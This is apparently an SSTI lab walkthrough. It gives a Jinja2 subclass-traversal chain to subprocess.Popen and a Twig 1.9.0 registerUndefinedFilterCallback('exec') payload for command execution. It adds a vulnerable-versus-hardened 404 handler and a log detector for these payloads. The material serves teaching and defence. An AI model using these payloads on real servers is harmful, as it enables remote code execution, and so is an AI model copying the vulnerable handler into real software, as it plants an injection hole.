Server Side Template Injection
A tool that can be used for this class of bug is tplmap.

This exercise was inspired by the following HackerOne report: https://hackerone.com/reports/125980. In this exercise, the bug is located in the 404 error handling.
This report gives you the foundation to:
Test for the vulnerability with {{'7'*7}}
Get code execution with:
{{''.__class__.mro()[1].__subclasses__()}}
Read the report carefully: the double underscores (__) are hidden in the original report because its content was rendered as Markdown.
You may need to change the index 1 to get the list of interesting classes. Once you have it, you need to find one that gives you code execution. The following payload gives you access to <class 'subprocess.Popen'>:
{{''.__class__.mro()[1].__subclasses__()[X]}}
Where X is the integer you need to find.
Finally, you can call this method using:
{{''.__class__.mro()[1].__subclasses__()[X](COMMAND)}}
Where:
X was found previously.
COMMAND is the command you want to run.
Make sure you read the Python documentation for Popen so that you get the right syntax for the command (or add the right option).
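The 404 handler bug described above, shown from the defender's side as an added example that is not part of the exercise or the HackerOne report: a Jinja2 404 handler written the vulnerable way (the requested path is concatenated into the template source) next to the hardened version (a constant template, with the path passed in as render data), plus a regression check that uses the exercise's own {{'7'*7}} probe. It assumes Jinja2 is installed; the handler names and the HTML are constructed for the illustration.

```python
# Added example, not part of the exercise or the HackerOne report: the same
# 404 handler written the vulnerable way and the fixed way, plus the check a
# reviewer would run with the exercise's own probe. Assumes Jinja2 is installed.
from jinja2 import Environment

env = Environment(autoescape=True)


def render_404_vulnerable(requested_path: str) -> str:
    """Vulnerable: the requested path becomes part of the template *source*,
    so Jinja2 parses any {{ ... }} inside it as code. This is the bug class
    the exercise places in the 404 error handling."""
    source = "<h1>Not found</h1><p>The page " + requested_path + " does not exist.</p>"
    return env.from_string(source).render()


# Hardened: the template source is a constant compiled once; untrusted data
# only ever enters through the render context, where it is treated as text.
NOT_FOUND_TEMPLATE = env.from_string(
    "<h1>Not found</h1><p>The page {{ requested_path }} does not exist.</p>"
)


def render_404_safe(requested_path: str) -> str:
    """Fixed: same output for ordinary paths, but template syntax in the path
    is echoed back (HTML-escaped by autoescape) instead of being evaluated."""
    return NOT_FOUND_TEMPLATE.render(requested_path=requested_path)


def evaluates_template_syntax(render_404) -> bool:
    """Regression check using the exercise's probe {{'7'*7}}: if the rendered
    page contains 7777777, the probe was executed, i.e. the handler is injectable."""
    return "7777777" in render_404("/{{'7'*7}}")


if __name__ == "__main__":
    for name, handler in (("vulnerable", render_404_vulnerable), ("safe", render_404_safe)):
        print(f"{name}: injectable={evaluates_template_syntax(handler)}")
        print("   ", handler("/{{'7'*7}}"))
```

The fix is the shape of the code, not a filter on the input: request data must never reach the template compiler as source, only the render context as values. Where user-supplied template source genuinely cannot be avoided, jinja2.sandbox.SandboxedEnvironment refuses attribute access to names such as __class__ and __subclasses__ and is worth using as defence in depth, but it is not a substitute for the constant-template pattern above.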
This challenge covers the exploitation of a Server Side Template Injection in an old version of Twig (1.9.0).
This issue can be used to gain code execution on the server. To get code execution, you need to find a way to execute a command using the functions the template engine exposes. Fortunately, the following code can be used:
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('uname')}}
Using this code, you should be able to score this exercise.
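Both payloads on this page (the Jinja2 __class__/mro()/__subclasses__ chain and the Twig registerUndefinedFilterCallback/getFilter trick) leave distinctive traces in web server access logs, and the 7*7 probe usually precedes them. The following detector is an added example, not part of either exercise: it parses constructed common-log-format lines (made-up IPs, timestamps and paths), URL-decodes each request path, and classifies it as a 7*7 probe, a gadget-name exploitation attempt, or bare template syntax. The regex patterns are assumptions built from the delimiters and names quoted above, not from any vendor signature set.

```python
# Added example, not from the exercises: a detector for SSTI probes in web
# server access logs. The log lines are constructed for this illustration
# (common log format, made-up IPs, timestamps and paths); the patterns are
# the delimiters and names used in the two payloads quoted on the page.
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /%7B%7B%277%27*7%7D%7D HTTP/1.1" 404 233
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /%7B%7B%27%27.__class__.mro()%5B1%5D.__subclasses__()%7D%7D HTTP/1.1" 404 9120
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /missing-page HTTP/1.1" 404 233
10.0.0.11 - - [01/Jan/2024:10:00:20 +0000] "GET /%7B%7B_self.env.registerUndefinedFilterCallback(%27exec%27)%7D%7D HTTP/1.1" 404 233
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Expression delimiters of Jinja2/Twig ({{ }}, {% %}) plus ${ } and <% %> used by other engines.
TEMPLATE_SYNTAX_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%=?.*?%>", re.S)

# The arithmetic / string-multiplication probe used to confirm evaluation, e.g. {{7*7}} or {{'7'*7}}.
ARITH_PROBE_RE = re.compile(r"\{\{\s*'?\d+'?\s*\*\s*'?\d+'?\s*\}\}")

# Names taken from the Jinja2 and Twig payloads quoted on the page.
GADGET_RE = re.compile(
    r"__class__|__mro__|\.mro\(|__subclasses__|__globals__|__builtins__|"
    r"registerUndefinedFilterCallback|getFilter\(|\bsubprocess\b|\bpopen\b",
    re.I,
)


def parse_line(line: str):
    """Parse one common-log-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Attackers URL-encode braces; decode before matching so %7B%7B is seen as {{.
    rec["decoded_path"] = unquote(rec["path"])
    return rec


def classify_path(decoded_path: str):
    """Return 'gadget', 'probe', 'template-syntax' or None, from most to least severe."""
    if not TEMPLATE_SYNTAX_RE.search(decoded_path):
        return None
    if GADGET_RE.search(decoded_path):
        return "gadget"           # object-traversal / filter-callback names: exploitation attempt
    if ARITH_PROBE_RE.search(decoded_path):
        return "probe"            # classic 7*7 confirmation probe
    return "template-syntax"      # delimiters only: worth a look, low confidence


def scan_log(text: str):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify_path(rec["decoded_path"])
        if verdict:
            findings.append({"ip": rec["ip"], "status": rec["status"], "size": rec["size"],
                             "verdict": verdict, "path": rec["decoded_path"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:16} {f['ip']:10} {f['status']} {f['size']:>6}  {f['path']}")
```

Run over the constructed log this flags three requests from two sources: the 7*7 probe, the __subclasses__ listing, and the Twig callback registration. The response sizes in the sample are constructed to show a second signal worth correlating: the 404 page that answered the __subclasses__ request is much larger than the other 404s, which is what an evaluated class listing would do to a template-driven error page. URL-decoding before matching matters; the raw log never contains a literal brace.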